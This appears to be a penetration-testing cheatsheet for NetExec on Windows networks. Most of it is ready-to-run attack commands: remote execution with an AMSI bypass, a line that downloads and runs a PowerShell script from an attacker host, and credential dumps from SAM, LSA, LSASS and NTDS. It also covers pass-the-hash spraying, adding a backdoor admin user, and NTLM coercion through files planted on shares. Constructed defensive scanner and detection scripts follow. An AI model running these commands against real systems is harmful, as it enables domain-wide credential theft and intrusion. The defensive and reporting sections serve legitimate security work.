Methodology Checklist
- Remote code execution (CMD): nxc smb [TARGET] -u [USER] -p [PASS] -x "whoami"
- Remote code execution (PowerShell): nxc smb [TARGET] -u [USER] -p [PASS] -X "Get-Process"
- SAM dump: nxc smb [TARGET] -u [USER] -p [PASS] --sam
- LSA dump: nxc smb [TARGET] -u [USER] -p [PASS] --lsa
- LSASS dump: nxc smb [TARGET] -u [USER] -p [PASS] -M lsassy
- NTDS dump (DC only): nxc smb [DC_IP] -u [USER] -p [PASS] --ntds
- PtH across subnet: nxc smb [SUBNET]/24 -u [USER] -H [HASH] --local-auth
- Spider shares: nxc smb [TARGET] -u [USER] -p [PASS] -M spider_plus
Operational Context
Use when: Valid credentials or hash obtained → use nxc to extract secrets, dump SAM/LSA/NTDS, and run commands across multiple hosts.
Think Dumber First: nxc smb [TARGETS] -u [USER] -p [PASS] --sam dumps SAM across all targets with one command. --lsa for LSA secrets (service account creds). --ntds on DCs for full domain hash dump.
Skip when: Only one target and direct access available → Mimikatz or impacket-secretsdump directly may be faster.
Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| nxc smb [TARGET_IP] -u [USER] -p [PASS] -x "[CMD]" | Execute CMD command on target (requires admin) |
| nxc smb [TARGET_IP] -u [USER] -p [PASS] -X "[PS_CMD]" | Execute PowerShell with auto AMSI bypass |
| nxc smb [TARGET_IP] -u [USER] -p [PASS] --sam | Dump local SAM hashes |
| nxc smb [DC_IP] -u [USER] -p [PASS] --ntds | Dump entire NTDS.dit (all domain hashes) from DC |
| nxc smb [TARGET_IP] -u [USER] -p [PASS] --lsa | Dump LSA secrets + cached domain credentials (DCC2) |
| nxc smb [TARGET_IP] -u [USER] -p [PASS] -M lsassy | Dump LSASS via lsassy module |
| nxc smb [TARGET_IP] -u [USER] -p [PASS] -M procdump | Dump LSASS via Sysinternals ProcDump |
| nxc [PROTOCOL] [TARGET_IP] -u [USER] -H [NTLM_HASH] | Pass-the-Hash authentication |
| nxc smb [TARGET_IP] -u [USER] -p [PASS] --share [SHARE] --put-file [LOCAL] [REMOTE] | Upload file to SMB share |
| nxc smb [TARGET_IP] -u [USER] -p [PASS] --share [SHARE] --get-file [REMOTE] [LOCAL] | Download file from SMB share |
| nxc smb [TARGET_IP] -u [USER] -p [PASS] --spider [SHARE] --pattern [STRING] | Spider share for filename patterns |
| nxc smb [TARGET_IP] -u [USER] -p [PASS] -M spider_plus -o EXCLUDE_DIR=IPC$,print$ | Full recursive share spider with JSON index |
| nxc smb [TARGET_IP] -u [USER] -p [PASS] -M rdp -o ACTION=enable | Enable RDP on target |
| nxc mssql [TARGET_IP] -u [USER] -p [PASS] -M mssql_priv | Find MSSQL privilege escalation paths |
| nxc mssql [TARGET_IP] -u [USER] -p [PASS] -M mssql_priv -o ACTION=privesc | Escalate MSSQL privileges |
Deep Dive & Workflow
Remote Execution (requires admin, shown as "(Pwn3d!)")
# CMD execution
nxc smb [TARGET_IP] -u [USER] -p [PASS] -x "whoami /priv"
nxc smb [TARGET_IP] -u [USER] -p [PASS] -x "net user [NEW_USER] [PASS] /add && net localgroup administrators [NEW_USER] /add"
# PowerShell execution (AMSI auto-bypassed)
nxc smb [TARGET_IP] -u [USER] -p [PASS] -X "Get-MpComputerStatus"
nxc smb [TARGET_IP] -u [USER] -p [PASS] -X "IEX(IWR http://[LHOST]/shell.ps1 -UseBasicParsing)"
# If -X fails (payload too long): use hosted stager
nxc smb [TARGET_IP] -u [USER] -p [PASS] --amsi-bypass amsi_bypass.txt -X "[PAYLOAD]"
Secret Dumping Hierarchy
# 1. SAM (local hashes โ all machines)
nxc smb [TARGET_IP] -u [USER] -p [PASS] --sam
# → MACHINE\Administrator:[NTLM] → PtH to this machine
# → Local admin reuse: try hash on other machines
# 2. LSA (service account creds, cached domain creds)
nxc smb [TARGET_IP] -u [USER] -p [PASS] --lsa
# → Cleartext creds for service accounts
# → DCC2 hashes (slower to crack, hashcat mode 2100)
# 3. LSASS (logged-on user credentials)
nxc smb [TARGET_IP] -u [USER] -p [PASS] -M lsassy
# → If AV blocks lsassy, try: -M procdump or -M nanodump
# 4. NTDS.dit (ALL domain account hashes, DC only)
nxc smb [DC_IP] -u [USER] -p [PASS] --ntds
# → Dumps via VSS; requires DC admin
# → Complete domain hash dump for PtH / offline cracking
Pass-the-Hash with NetExec
# PtH to verify lateral movement
nxc smb [TARGET_IP] -u Administrator -H [NTLM_HASH] --local-auth
# → (Pwn3d!) = local admin confirmed
# PtH for domain account
nxc smb [TARGET_IP] -u [DOMAIN_USER] -H [NTLM_HASH]
# Spray hash across subnet
nxc smb 172.16.5.0/23 -u Administrator -H [NTLM_HASH] --local-auth
# → Finds all machines where this local admin hash is reused
# WinRM access
nxc winrm [TARGET_IP] -u [USER] -H [NTLM_HASH]
# → (Pwn3d!) = can Enter-PSSession
SMB File Operations
# Upload payload
nxc smb [TARGET_IP] -u [USER] -p [PASS] --share C$ --put-file /tmp/shell.exe \\Windows\\Temp\\shell.exe
# Download loot
nxc smb [TARGET_IP] -u [USER] -p [PASS] --share C$ --get-file \\Users\\Administrator\\Desktop\\creds.txt /tmp/creds.txt
# Spider share for files matching pattern
nxc smb [TARGET_IP] -u [USER] -p [PASS] --spider C$ --pattern ".kdbx"
# Deep spider with content search
nxc smb [TARGET_IP] -u [USER] -p [PASS] --spider SYSVOL --content --regex "password"
# Full recursive spider (generates JSON index of all accessible files)
nxc smb [TARGET_IP] -u [USER] -p [PASS] -M spider_plus -o EXCLUDE_DIR=IPC$,print$
# → Output in ~/.nxc/workspaces/default/spider_plus/
MSSQL Post-Exploitation
# Test MSSQL with AD auth
nxc mssql [TARGET_IP] -u [USER] -p [PASS] -d [DOMAIN]
# Test with local SQL auth
nxc mssql [TARGET_IP] -u sa -p [PASS] --local-auth
# Find privesc paths
nxc mssql [TARGET_IP] -u [USER] -p [PASS] -M mssql_priv
# → Shows: db_owner → sysadmin path, EXECUTE AS, impersonation
# Escalate to sysadmin
nxc mssql [TARGET_IP] -u [USER] -p [PASS] -M mssql_priv -o ACTION=privesc
# Execute command after escalation
nxc mssql [TARGET_IP] -u [USER] -p [PASS] -x "xp_cmdshell 'whoami'"
NTLM Coercion for Hash Capture
# Drop LNK file on writable share → triggers NTLM auth to attacker
nxc smb [TARGET_IP] -u [USER] -p [PASS] -M slinky -o SERVER=[LHOST] NAME=test
# Drop Search Connector on share
nxc smb [TARGET_IP] -u [USER] -p [PASS] -M drop-sc -o URL=\\\\[LHOST]\\share SHARE=Public
# Capture with Responder running on attacker
sudo responder -I [IFACE] -wv
Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| nxc --sam returns access denied | Not admin on target | Verify: nxc smb [TARGET] -u [USER] -p [PASS] shows Pwn3d! first |
| nxc --ntds hangs | DC overloaded or timeout | Add --ntds drsuapi for faster method; or --ntds vss for VSS-based dump |
| -x command fails | WMI not enabled | Try -X for PowerShell execution; or use --exec-method smbexec |
| nxc --lsa returns only DPAPI secrets | No service account creds | LSA secrets only contain local data; service account creds in NTDS on DC |
| Command output truncated | Long output | Pipe to file on target: -x 'cmd /c systeminfo > C:\Temp\out.txt' then retrieve file |
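The coercion modules in the NTLM Coercion section (slinky, drop-sc) rely on a .lnk or search connector left on a writable share whose icon or location is a UNC path on the attacker's host; .url and .scf files can be abused the same way. The following scanner is an added defensive check, not part of NetExec or this cheatsheet: it walks a share, pulls UNC host names out of those file types (stored as ANSI text, or as UTF-16LE inside .lnk) and reports any host not on an allowlist of known file servers. It does not parse the full Shell Link structure; matching the UNC strings is enough to surface a planted file. The sample share tree, the host names and the minimal fake .lnk bodies are constructed.

```python
"""Scan a share tree for planted link files that point clients at an outside UNC host."""
import os
import re
import tempfile

SUSPECT_EXTENSIONS = {".lnk", ".searchconnector-ms", ".url", ".scf"}
# \\host\...  stored as ANSI bytes
UNC_ANSI = re.compile(rb"\\\\([A-Za-z0-9._-]+)")
# \\host\...  stored as UTF-16LE bytes: every character is followed by a NUL byte
UNC_UTF16 = re.compile(rb"\\\x00\\\x00((?:[A-Za-z0-9._-]\x00)+)")


def unc_hosts(data):
    """Return the set of host names referenced by UNC paths in a file body."""
    hosts = {m.group(1).decode("ascii") for m in UNC_ANSI.finditer(data)}
    hosts |= {m.group(1).decode("utf-16-le") for m in UNC_UTF16.finditer(data)}
    return hosts


def scan_share(root, allowed_hosts):
    """Walk root; return findings for link-type files that reference a UNC host
    outside allowed_hosts. Each finding is {"path": relative path, "hosts": [...]}."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SUSPECT_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            unknown = sorted(h for h in unc_hosts(data) if h.lower() not in allowed)
            if unknown:
                findings.append({"path": os.path.relpath(path, root), "hosts": unknown})
    return sorted(findings, key=lambda f: f["path"])


def build_sample_share():
    """Write a constructed share tree to a temp dir and return its path: one benign
    shortcut to the corporate file server, plus a planted .lnk and a planted search
    connector that both point at a host that is not an approved file server."""
    root = tempfile.mkdtemp(prefix="share_")
    public = os.path.join(root, "Public")
    os.makedirs(public)
    # Minimal fake .lnk bodies: the 0x4C header-size field followed by a UTF-16LE path
    # (constructed; a real Shell Link carries much more structure around the path).
    with open(os.path.join(public, "Quarterly.lnk"), "wb") as fh:
        fh.write(b"L\x00\x00\x00" + "\\\\fs01.corp.example\\Finance\\Q1.xlsx".encode("utf-16-le"))
    with open(os.path.join(public, "test.lnk"), "wb") as fh:
        fh.write(b"L\x00\x00\x00" + "\\\\10.0.5.40\\share\\icon.ico".encode("utf-16-le"))
    # Search connector: XML whose <url> element is the UNC location Explorer will open.
    with open(os.path.join(public, "Documents.searchConnector-ms"), "w", encoding="utf-8") as fh:
        fh.write('<?xml version="1.0" encoding="UTF-8"?>'
                 '<searchConnectorDescription><simpleLocation>'
                 '<url>\\\\10.0.5.40\\share</url>'
                 '</simpleLocation></searchConnectorDescription>')
    return root


if __name__ == "__main__":
    share = build_sample_share()
    for finding in scan_share(share, ["fs01.corp.example"]):
        print(f"{finding['path']}: references {', '.join(finding['hosts'])}")
```

Run it against a mounted copy of each writable share on a schedule; the allowlist is the set of file servers users are expected to reach, so a new link resolving anywhere else (an IP address in particular) is worth a look before a client opens the folder.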
Reporting Trigger
Finding Title: NetExec Mass Credential Extraction Across Multiple Hosts
Impact: Single-command credential extraction via nxc across multiple hosts provides a complete credential inventory for the environment, enabling password reuse identification and lateral movement path mapping.
Root Cause: Local administrator account shared across multiple hosts (no LAPS). Admin access on one host enables credential extraction from all hosts with the shared password.
Recommendation: Deploy LAPS immediately. Alert on bulk remote SAM/LSA dump attempts. Implement Credential Guard on all Windows 10+ endpoints. Restrict admin access to designated management accounts.
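The recommendation to alert on bulk remote SAM/LSA dumps needs a concrete rule. A --sam or --lsa sweep and a -H hash spray across a subnet both leave the same footprint in Windows Security logs once a SIEM collects them from every host: one source address performing network logons (event 4624, logon type 3) to many hosts in minutes, usually NTLM with a local account, with accesses to ADMIN$ or C$ (event 5145) on each. The following detector is an added defensive example, not part of NetExec or this cheatsheet. The record field names are an assumption about the normalized schema, and the sample events, hosts and addresses are constructed.

```python
"""Flag one source address authenticating to many hosts within a short window."""
from collections import defaultdict
from datetime import datetime, timedelta

ADMIN_SHARES = {"ADMIN$", "C$"}


def _event(ts, host, event_id, src_ip, user, auth_package="NTLM", share=None):
    # Normalized record shape (assumed schema, not any vendor's field names).
    return {"ts": ts, "host": host, "event_id": event_id, "logon_type": 3,
            "auth_package": auth_package, "src_ip": src_ip, "user": user,
            "share": share}


# Constructed sample: 10.0.5.40 logs on to eight workstations as the local
# Administrator account over NTLM inside four minutes and opens ADMIN$ on each
# (the shape of a --sam sweep or a --local-auth hash spray). A backup server
# does two ordinary Kerberos logons in the same period.
SAMPLE_EVENTS = []
for i in range(8):
    ts = f"2024-03-01T09:{i // 2:02d}:{(i % 2) * 30:02d}"
    host = f"WS{i + 1:02d}"
    SAMPLE_EVENTS.append(_event(ts, host, 4624, "10.0.5.40", "Administrator"))
    SAMPLE_EVENTS.append(_event(ts, host, 5145, "10.0.5.40", "Administrator",
                                share="\\\\*\\ADMIN$"))
SAMPLE_EVENTS.append(_event("2024-03-01T09:02:00", "FS01", 4624, "10.0.1.9",
                            "svc_backup", auth_package="Kerberos"))
SAMPLE_EVENTS.append(_event("2024-03-01T09:02:10", "FS02", 4624, "10.0.1.9",
                            "svc_backup", auth_package="Kerberos"))


def _parse_ts(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S")


def _share_name(share):
    # "\\*\ADMIN$" -> "ADMIN$"
    return share.rstrip("\\").rsplit("\\", 1)[-1].upper()


def detect_fan_out(events, window=timedelta(minutes=10), min_hosts=5):
    """Return one finding per (src_ip, user) that reached at least min_hosts
    distinct hosts via network logon inside any span of length window."""
    logons = defaultdict(list)            # (src_ip, user) -> [(ts, host, package)]
    admin_share_hosts = defaultdict(set)  # src_ip -> hosts where ADMIN$/C$ was opened
    for e in events:
        if e["event_id"] == 4624 and e["logon_type"] == 3:
            logons[(e["src_ip"], e["user"])].append(
                (_parse_ts(e["ts"]), e["host"], e["auth_package"]))
        elif e["event_id"] == 5145 and e.get("share") and _share_name(e["share"]) in ADMIN_SHARES:
            admin_share_hosts[e["src_ip"]].add(e["host"])

    findings = []
    for (src_ip, user), recs in logons.items():
        recs.sort()
        # Slide a window over the sorted logons; report the first span over the threshold.
        for i, (t0, _, _) in enumerate(recs):
            in_window = [r for r in recs[i:] if r[0] - t0 <= window]
            hosts = {h for _, h, _ in in_window}
            if len(hosts) >= min_hosts:
                findings.append({
                    "src_ip": src_ip,
                    "user": user,
                    "host_count": len(hosts),
                    "hosts": sorted(hosts),
                    "ntlm_only": all(p == "NTLM" for _, _, p in in_window),
                    "admin_share_hosts": len(admin_share_hosts[src_ip] & hosts),
                })
                break
    return findings


if __name__ == "__main__":
    for f in detect_fan_out(SAMPLE_EVENTS):
        print(f"{f['src_ip']} as {f['user']}: {f['host_count']} hosts in window, "
              f"NTLM only={f['ntlm_only']}, admin share opened on {f['admin_share_hosts']}")
```

The threshold and window are tuning knobs: a local account (no domain prefix) authenticating with NTLM to many hosts is the strongest signal, since that is exactly what a shared local administrator password plus pass-the-hash produces, and it is the pattern LAPS removes.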